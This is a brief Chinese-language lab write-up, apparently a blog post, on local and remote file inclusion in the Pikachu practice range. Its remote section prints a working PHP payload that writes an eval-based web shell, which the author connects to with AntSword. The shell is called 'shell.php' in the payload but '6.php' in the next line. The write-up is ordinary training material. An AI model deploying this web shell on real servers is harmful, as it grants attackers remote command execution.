一、本地文件包含
打开靶场,选择一个查看
读取一个本地文件查看
二、远程文件包含
在云服务器创建一个txt文件写入
<?php fputs(fopen("shell.php","w"),'<?php eval($_POST["cmd"]);?>')?>
在本机上查看,会生成一个6.php,使用蚁剑连接查看
标签:文件,包含,查看,Pikachu,漏洞,本地,txt,远程 From: https://blog.csdn.net/m0_73771249/article/details/141869926